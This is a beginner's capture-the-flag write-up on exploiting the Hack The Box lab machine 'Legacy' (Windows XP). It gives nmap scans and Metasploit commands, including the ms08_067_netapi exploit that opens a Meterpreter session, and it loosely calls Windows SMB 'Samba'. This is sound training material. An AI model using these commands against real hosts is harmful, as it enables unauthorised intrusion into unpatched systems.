Here is my the very first hacking writeup. And the first machine is
Legacy — retired, but pretty useful for novice. This machine was not chosen by chance, it is encountered as the first practical experience in the Practical Ethical Hacking course by The Cyber Mentor. I will try to work on each further writeup, another 9 boxes are expected during the course.
Scanning
First thing first, I run quick nmap scan to search for open ports.
nmap -p- -T4 10.10.10.4
Not shown: 65532 filtered ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp closed ms-wbt-server
We see 3 open ports, now I scan these ports to gain more information.
nmap -p139,445,3389 -A 10.10.10.4
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (94%), General Dynamics embedded (87%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows XP (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows 2000 SP4 (91%), Microsoft Windows XP SP2 or Windows Server 2003 (91%), Microsoft Windows Server 2003 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP SP2 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xpHost script results:
|_clock-skew: mean: 5d00h57m41s, deviation: 1h24m50s, median: 4d23h57m41s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:be:5d (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2020–01–05T20:23:46+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
After scanning we can see that the machine running on Windows XP, most likely SP3. Samba running on ports 139 and 445.
For additional scanning I’ll use Metasploit and try to analyze Samba version.
> msfconsole
msf5 > search smb_version
And get the result.
0 auxiliary/scanner/smb/smb_version
Then choose the module and look for setting to tweak.
msf5 > use 0
msf5 auxiliary(scanner/smb/smb_version) > options
I want specify only the target’s ip, setting this parameter and run the module.
msf5 auxiliary(scanner/smb/smb_version) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf5 auxiliary(scanner/smb/smb_version) > run[+] 10.10.10.4:445 — Host is running Windows XP SP3 (language:English) (name:LEGACY) (workgroup:HTB ) (signatures:optional)
[*] 10.10.10.4:445 — Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Exploitation
Now we sure that the machine running Windows XP SP3 and we know that Samba running on open ports. Now we a trying to google exploit for Windows XP SP3 Samba. Rapid7 give me the match.
Read the description and use the exploit.
msf5 auxiliary(scanner/smb/smb_version) > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
Also we can choose target OS version, but list doesn’t include English version (surprisingly).
msf5 exploit(windows/smb/ms08_067_netapi) > show targets
Then just run the exploit.
msf5 exploit(windows/smb/ms08_067_netapi) > run
Meterpreter session opens and now we have root access. We just need to navigate through the system and check standard places.
Output
A fairly simple box for learning how to scan, search and exploit vulnerabilities. The task is not difficult to handle using Metasploit, this box becomes much more interesting without the use of this tool. I want to note the writeup by Rana Khalil about breaking this box without using Metasploit.
